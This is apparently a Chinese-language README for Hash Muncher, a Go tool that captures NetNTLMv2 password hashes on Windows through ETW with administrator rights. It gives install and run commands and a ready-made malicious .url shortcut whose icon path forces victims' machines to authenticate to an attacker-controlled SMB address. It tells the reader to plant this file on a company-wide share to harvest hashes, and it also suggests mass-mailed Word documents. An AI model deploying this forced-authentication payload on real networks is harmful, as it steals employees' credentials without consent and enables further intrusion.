使用 Windows 上的管理员权限通过 ETW 获取 NetNTLMv2 哈希
有三种不同的方式来安装并运行它
go install github.com/lkarlslund/hashmuncher@latest
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1
确保 Windows 防火墙允许"文件和打印机共享",因为 Hash Muncher 需要内置的 SMB 服务来发送和接收初始请求,并向目标发送响应数据包。
在提升的命令提示符中运行 Hash Muncher
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1
将 IP 地址替换为你的 Hash Muncher 机器,并将文件保存到(全公司范围的)文件共享,命名为 'whatever.url',然后看着哈希源源不断地涌来。
Red Team Notes - Forced Authentication 中提到了其他方法,你也可以通过向所有人发送 Word 文档来获得成功,但这一点也不隐蔽。
我一直在断断续续地研究 ETW,但当我看到 Nettitude Labs 的研究 时,我就知道我必须把它变成我最喜欢的语言 Golang 中易于使用的工具!Nettitude Labs 有一个用 C# 编写的可在 .Net 框架下运行的 POC,可能对你来说是更好的选择。所以我并没有真正发明什么,只是把它作为替代品添加进来。
如果你喜欢 Windows 安全相关的东西,你可能也会喜欢我的攻击图工具 Adalanche